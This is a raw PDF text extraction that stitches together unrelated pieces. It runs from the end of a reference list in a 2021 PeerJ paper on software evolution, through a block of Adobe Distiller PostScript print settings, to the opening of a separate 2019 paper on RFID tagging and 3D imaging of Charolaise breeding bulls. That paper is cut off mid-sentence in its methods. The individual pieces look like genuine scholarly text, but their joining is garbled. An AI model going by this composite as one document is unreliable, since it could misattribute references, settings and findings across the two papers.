http://dx.doi.org/10.1007/s10664-019-09772-z http://dx.doi.org/10.1016/j.infsof.2009.04.013 http://dx.doi.org/10.1109/TEVC.2017.2693219 http://dx.doi.org/10.1145/1189748.1189751 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ Robles G, González-Barahona JM, Herraiz I. 2005. An empirical approach to software archaeology. In: Poster Proceedings of the 2005 International Conference on Software Maintenance, ICSM ’05. 47–50. Rodríguez D, Sicilia M, GarcÃa E, Harrison R. 2012. Empirical findings on team size and productivity in software development. Journal of Systems and Software 85(3):562–570 DOI 10.1016/j.jss.2011.09.009. Salfner F, Lenk M, Malek M. 2010. A survey of online failure prediction methods. ACM Computing Surveys 42(3):1–42 DOI 10.1145/1670679.1670680. Samoladas I, Angelis L, Stamelos I. 2010. Survival analysis on the duration of open source projects. Information and Software Technology 52(9):902–922 DOI 10.1016/j.infsof.2010.05.001. Scanniello G. 2011. Source code survival with the Kaplan Meier. In: Proceedings of the 27th IEEE International Conference on Software Maintenance, ICSM ’11. 524–527. Sentas P, Angelis L, Stamelos I. 2008. A statistical framework for analyzing the duration of software projects. Empirical Software Engineering 13(2):147–184 DOI 10.1007/s10664-007-9051-7. Servant F, Jones JA. 2017. Fuzzy fine-grained code-history analysis. In: Proceedings of the 49th International Conference on Software Engineering, ICSE ’17. Los Alamitos: IEEE Computer Society Press. Sharma T, Fragkoulis M, Spinellis D. 2016. Does your configuration code smell? In: 2016 IEEE/ACM 13th Working Conference on Mining Software Repositories (MSR). Los Alamitos: IEEE Computer Society, 189–200. Shin Y, Meneely A, Williams L, Osborne JA. 2010. Evaluating complexity, code churn, and developer activity metrics as indicators of software vulnerabilities. IEEE Transactions on Software Engineering 37(6):772–787 DOI 10.1109/TSE.2010.81. Spinellis D. 2016a. How can I obtain with git log a series of patches that can be auto-applied? Available at http://www.webcitation.org/6jyf48Ue7. Spinellis D. 2016b. A repository of Unix history and evolution. Empirical Software Engineering 22:1372–1404. Spinellis D. 2019. Dspinellis/tokenizer: version 1.1. Available at https://github.com/dspinellis/ tokenizer/. Spinellis D, Kotti Z, Mockus A. 2020. A dataset for GitHub repository deduplication. In: 17th International Conference on Mining Software Repositories, MSR ’20. New York: Association for Computing Machinery, 523–527. Stamelos I, Angelis L, Oikonomou A, Bleris GL. 2002. Code quality analysis in open source software development. Information Systems Journal 12(1):43–60 DOI 10.1046/j.1365-2575.2002.00117.x. Vallée-Rai R, Co P, Gagnon E, Hendren L, Lam P, Sundaresan V. 2010. Soot: a java bytecode optimization framework. In: CASCON First Decade High Impact Papers, CASCON ’10. Riverton: IBM Corp, 214–224. Van Genuchten M, Hatton L. 2013. Metrics with impact. IEEE Software 30(4):99–101 DOI 10.1109/MS.2013.81. Voinea L, Telea A, Van Wijk JJ. 2005. CVSscan: visualization of code evolution. In: Proceedings of the 2005 ACM Symposium on Software Visualization, SoftVis–05. New York: Association for Computing Machinery, 47–56. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 32/33 http://dx.doi.org/10.1016/j.jss.2011.09.009 http://dx.doi.org/10.1145/1670679.1670680 http://dx.doi.org/10.1016/j.infsof.2010.05.001 http://dx.doi.org/10.1007/s10664-007-9051-7 http://dx.doi.org/10.1109/TSE.2010.81 http://www.webcitation.org/6jyf48Ue7 https://github.com/dspinellis/tokenizer/ https://github.com/dspinellis/tokenizer/ http://dx.doi.org/10.1046/j.1365-2575.2002.00117.x http://dx.doi.org/10.1109/MS.2013.81 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ White M, Vendome C, Linares-Vásquez M, Poshyvanyk D. 2015. Toward deep learning software repositories. In: Proceedings of the 12th Working Conference on Mining Software Repositories, MSR ’15. Piscataway: IEEE Press, 334–345. Zhang H. 2009. An investigation of the relationships between lines of code and defects. In: Proceedings of the 25th IEEE International Conference on Software Maintenance, ICSM ’09. 274–283. Zheng X, Zeng D, Li H, Wang F. 2008. Analyzing open-source software systems as complex networks. Physica A: Statistical Mechanics and its Applications 387(24):6190–6200 DOI 10.1016/j.physa.2008.06.050. Zimmermann T. 2006. Fine-grained processing of CVS archives with APFEL. In: Proceedings of the 2006 OOPSLA Workshop on Eclipse Technology EXchange, eclipse ’06. New York: Association for Computing Machinery, 16–20. Zimmermann T, Kim S, Zeller A, Whitehead EJ Jr. 2006. Mining version archives for co-changed lines. In: Proceedings of the 2006 International Workshop on Mining Software Repositories, MSR ’06. New York: ACM, 72–75. Zimmermann T, Zeller A, Weissgerber P, Diehl S. 2005. Mining version histories to guide software changes. IEEE Transactions on Software Engineering 31(6):429–445 DOI 10.1109/TSE.2005.72. Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 33/33 http://dx.doi.org/10.1016/j.physa.2008.06.050 http://dx.doi.org/10.1109/TSE.2005.72 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.372 Software evolution: the lifetime of fine-grained elements Introduction Methods Results and discussion Threats to validity Related work Conclusions and implications flink7 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_meuao2faobcbtcmmnbk3wl5fju ---- Submitted 4 October 2018 Accepted 8 February 2019 Published 4 March 2019 Corresponding author Maria Grazia Cappai, mgcappai@uniss.it Academic editor Claudia Bauzer Medeiros Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.179 Copyright 2019 Cappai et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Integrating the RFID identification system for Charolaise breeding bulls with 3D imaging for virtual archive creation Maria Grazia Cappai1, Filippo Gambella2, Davide Piccirilli2, Nicola Graziano Rubiu3, Corrado Dimauro4, Antonio Luigi Pazzona2 and Walter Pinna1 1 Research Unit for Animal Nutrition, Department of Veterinary Medicine, University of Sassari, Sassari, Italy 2 Research Unit for Agriculture Engineering of the Department of Agriculture, University of Sassari, Sassari, Italy 3 NurEID Foundation, Nuragus, Italy 4 Research Unit for Animal Breeding Sciences of the Department of Agriculture, University of Sassari, Sassari, Italy ABSTRACT The individual electronic identification (EID) of cattle based on RFID technology (134.2 kHz ISO standard 11784) will definitely enter into force in European countries as an official means of animal identification from July 2019. Integrating EID with 3D digital images of the animal would lead to the creation of a virtual archive of breeding animals for the evaluation and promotion of morphology associated with economic traits, strategic in beef cattle production. The genetically-encoded morphology of bulls and cows together with the expression in the phenotype were the main drivers of omic technologies of beef cattle production. The evaluation of bulls raised for reproduction is mainly based on the conformation and heritability of traits, which culminates in muscle mass and optimized carcass traits in the offspring destined to be slaughtered. A bottom- up approach by way of SWOT analysis of the current morphological and functional evaluation process for bulls revealed a technological gap. The innovation of the process through the use of smart technologies was tested in the field. The conventional 2D scoring system based on visual inspection by breed experts was carried out on a 3D model of the live animal, which was found to be a faithful reproduction of live animal morphology, thanks to the non significant variance (p > 0.05) of means of the somatic measures determined on the virtual 3D model and on the real bull. The four main groups composing the scoring system of bull morphology can easily be carried out on the 3D model. These are as follows: (1) Muscular condition; (2) Skeletal development; (3) Functional traits; (4) Breed traits. The 3D-Bull model derived from the Structure from Motion (SfM) algorithm displays a high tech profile for the evaluation of animal morphology in an upgraded system. Subjects Bioinformatics, Computer Vision, Data Science, Spatial and Geographic Information Systems Keywords Electronic identification, Digital Image, Bull morphology, Data sharing, Stakeholder, 3D Digital Image How to cite this article Cappai MG, Gambella F, Piccirilli D, Rubiu NG, Dimauro C, Pazzona AL, Pinna W. 2019. Integrating the RFID identification system for Charolaise breeding bulls with 3D imaging for virtual archive creation. PeerJ Comput. Sci. 5:e179 http://doi.org/10.7717/peerj-cs.179 https://peerj.com mailto:mgcappai@uniss.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.179 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.179 INTRODUCTION The current identification system for cattle in European Union countries will be modified starting from 18th July 2019, the date on which EU Reg 911/2004 will be implemented. The individual electronic identification (EID) of cattle based on radio frequency technology (RFID, 134.2 kHz) will become an official means of cattle identification, in addition to the double plastic ear tag identification system (EU Reg 1760/2000). The automatic RFID- based identification of cattle will be part of the innovation process of animal recording, encompassing a digitized and real time automatically generated database, within the so-called Precision Livestock Farming (PLF). In view of the potential offered by RFID technology, several perspectives may lead to advanced production systems, of particular importance both for regulation compliance and the profitable management of herds. In this scenario, production goals differ depending on whether dairy or beef cattle are considered. Modern beef cattle production relies on decades of animal selection, oriented to the improvement of breeding system efficiency, basically to reduce costs and increase profits. Bovine breeds display morphological differences relating to production goals, if dairy or beef cattle are considered. In particular, beef cattle breeds are selected to improve carcass worth and the evaluation of body morphology of the live animal encompasses the interplay between genetic selection, breeding practices and expression of desirable traits. In 2007, Nkrumah and coworkers correlated genetic and phenotypic behaviour based on economically relevant traits (ERT) in Angus and Charolaise breeds, including feed intake, feed conversion ratio, fertility and temperament as those with a direct impact on the management and sustainability of the beef cattle farming system. The genetic value of animals is meant to spread to the whole herd since the productivity and sustainability of the farm does not rely on the single individual. In view of this aspect, the very accurate selection of breeding bulls and cows by the farmer is carried out to optimise production performance, which represents the main economic driver of beef cattle herds. In light of recent research conducted worldwide and of the ever more sophisticated genomic techniques, the latest achievements by genetic investigations on beef cattle (Burrow & Dillon, 1997; Voisinet et al., 1997; Gibb et al., 1998; Sowell et al., 1998; Burrow & Corbet, 2000; Schwartzkopf-Genswein, Atwood & McAllister, 2003; Robinson & Oddy, 2004; Nkrumah et al., 2007; Moore, Mrode & Coffey, 2017 Su et al., 2017; Leal et al., 2018; Fonseca et al., 2018; Soulat et al., 2018) outline the need to obtain very specialized morphological lines of animals, with typical body measurements and breed conformation. Several breeds of genetically selected beef cattle are acknowledged worldwide to be of elevated performance, and the Charolaise breed is one of these. This cattle breed originated in Bourgogne (France) and is characterized by the high quality of meat and acclimation characteristics (Briggs & Briggs, 1980). Nowadays, Charolaise beef cattle can be considered cosmopolite farm animals for meat production, along with some other breeds acknowledged worldwide to be selected for highly specialized traits. In Italy, the association of Charolaise and Limousine farmers (A.N.A.C.L.I.) was founded in 1987 with the creation of breed Registry Records at national level. The presence of the Charolaise breed in Italy is considerable and the Sardinia region contributes considerably to Italian Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 2/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.179 beef meat production in terms of the number of heads raised (14,463 Charolaise heads; source A.N.A.C.L.I.: http://www.anacli.it/WEBSITE/index.php?&pagid=2499&sessione=). Breeding bulls are selected by the farmer according to the type of herd and management. The most common type belongs to the ‘‘souche bouchér’’ line for the production of offspring with high live weight at birth and rapid skeletal and muscular development. Heifers or steers are normally slaughtered at an age of 16–18 months and weight to slaughter of about 650 kg. The economic value of the breeding bull is strongly influenced by the morphological evaluation carried out in regional and national fairs for livestock, in which animals are scored by breed experts. As recently evaluated in a bio-economic model by Leal et al. (2018), the dressing percentage, associated with carcass weight at slaughter and relative yield, in Angus cattle is that with the largest economic value within herd productions. This concept may be applied to all beef cattle breeds. It is important to underline that while advanced omic technologies have been used for decades in livestock sciences with particular regard to cattle, the evaluation of morphology through the scoring system of animals still conserves old-fashioned methods. The score attributed to the morphology of the breeding bull has an impact on the economic value of the animal and its progeny and increases the visibility of the farmer, who selects and raises animals for competitions. At present, different morphological sections are scored through an evaluation grid displaying a 2D schematic illustration of the generic bovine (Fig. 1). The score sheet reported in Fig. 1 displays the official scoring system adopted by the A.N.A.C.L.I. (2009). Breed experts judge animals in annual competitions on the basis of a semi-quantitative evaluation, based on the harmonic proportions of animal development, the morphology of anatomical districts and functional traits with direct impact on carcass composition. To a great extent, the overall evaluation is based on the experience of the breed evaluator and is carried out by classifying the animal according to: (1) Muscular condition; (2) Skeletal development; (3) Functional traits; (4) Breed specific traits. At present, this system appears to be technologically outdated if compared with the advanced technologies underlying the achievements of modern breed traits. In view of this gap, smart technologies largely adopted in the beef cattle sector (such as RFID, omic sciences, artificial insemination) have great potential for system improvement, as these may provide valid tools to implement the process for the evaluation of the breeding bull in a modern system. Against this backdrop, the goal of a competitive strategy relies on profitable and sustainable productions with regard to external competition (environmental or extrinsic competition) to strengthen the competitive internal advantages. Precision livestock farming (PLF) has entered livestock farms relatively recently. The efficiency of management was to be improved by way of smart technologies in terms of several aspects of the everyday breeding practices of food producing animals (Banhazi et al., 2012; Berckmans, 2014; Fournel, Rousseau & Laberge, 2017), particularly of cattle. It was hypothesized that the contactless, real time and digitalized recording of animal data could be the starting point to both internal and external competitive evaluation of the Charolaise breeding bull. In particular, 3D imaging is a technology that is widely deployed in several sectors. In livestock, the deployment of the technology based on 3D digital imaging is in Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 3/15 https://peerj.com http://www.anacli.it/WEBSITE/index.php?&pagid=2499&sessione= http://dx.doi.org/10.7717/peerj-cs.179 Figure 1 Actual 2D grid used for morphology scoring in beef cattle. The scheme displays both somato- metric measures and confomation scoring of beef cattle. Adapted from A.N.A.C.L.I. 2009 (http://www. anacli.it/WEBSITE/index.php?&pagid=2437&sessione=). Full-size DOI: 10.7717/peerjcs.179/fig-1 its infancy and the few papers on this topic testify to the cutting edge research exploring this new frontier of PLF (Wu et al., 2004; Kosgro, 2014; D’Eath et al., 2018). This paper describes an innovative and technological method that was explored to assess the potential of the integration of RFID for animal identification with 3D images of the real bull for the evaluation of the Charolaise breeding bull. This research was undertaken with the aim of: (a) carrying out a SWOT analysis to identify the Strengths, Weaknesses, Opportunities and Threats of traditional vs. innovative Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 4/15 https://peerj.com http://www.anacli.it/WEBSITE/index.php?&pagid=2437&sessione= http://www.anacli.it/WEBSITE/index.php?&pagid=2437&sessione= https://doi.org/10.7717/peerjcs.179/fig-1 http://dx.doi.org/10.7717/peerj-cs.179 processes of morphology evaluation; (b) testing the opportunity offered by the 3D digital model of the real animal in comparison to the 2D grid of the scoring system based on biometric measures in the perspective of a digital archive creation for e-commerce. MATERIAL AND METHODS Animal care and identification The animals involved in this study were cared for according to European Union legislation on animal protection and welfare (EU Reg 2010/63/EU). The trial involved two Charolaise bulls from the same farm which were 3 and 4 years old, multi-champions of breed and category both at regional and national level. The two bulls enrolled in the trial possess high morphological and genetic value and serve as breeders for all the cows raised on the same farm (total heads raised excluding calves = 46). In addition, their semen is also sold for artificial insemination (AI) on other farms. Bulls on one farm can also serve several other farms, thus the impact on offspring is multiplied for the desirable traits that farmers intend to introduce to their own herd. Raising too many breeding bulls in the same herd would not be economically viable because AI can provide high profits with few, but highly selected animals. The choice to involve these two breeding bulls was therefore driven by conventional farm management practices on one hand and by their morphological value on the other. Each bull was electronically identified with an endoruminal bolus (75 g. 70×21 mm RUMITAG bolus R©) holding a passive HDX transponder (radio frequency 134.2 kHz, 32. 5 ×3.8 mm, ISO 11784-11785 Tiris 32 mm), on voluntary basis. In compliance with current European mandatory rules (EU Reg 1760/2000) for the individual identification of cattle, the bulls were also identified with double plastic eartags. In vivo body measuring of the animals Both bulls (body weight between 1.27 and 1.3 tons) were individually handled in two distinct moments and temporarily placed in a paddock with a flat concrete floor to allow the recording of body measurements. Wither’s height, trunk length and distance at thighs were taken with the Lydtin stick, on repeated measures until reaching the same value for three replicates. In this regard, it is necessary to highlight that, while stressful condition were kept to a minimum and the animals were familiar with the facilities and personnel, any sudden movement of the bull may require several repetitions to measure one single parameter until a repeatable and acceptable value could be safely achieved. All measurements were recorded and used to calculate sensitivity and accuracy of in vivo vs. 3D model measurements. In field image capturing The acquisition of 2D digital pictures of the animal was carried out in a geo-referenced system (Fig. 2), where the bull stood in the centre of a circle (r =6 m) purposely drawn on the floor, in an area outside the barn, in natural daylight but in the shade of a shelter. The operator captured images with a digital camera integrated in a mobile phone (8 Mpx, focus length 4.15 mm, exposure 1/1721) and moved along the circumference where reference Cappai et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.179 5/15 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.179 Figure 2 Geo-referenced 360◦—image capture system in farm. The operator captured multiple conse- quent images with an overlap of at least 70%, moving around the bull that stood in the center of the circle. Full-size DOI: 10.7717/peerjcs.179/fig-2 points of known dimensions were located. The choice to use an integrated camera in a mobile phone was made to test whether a device that is easily available could be suitable for this purpose. The number of pictures taken from the different angles was determined on replicates until reaching the least frame capturing to obtain the 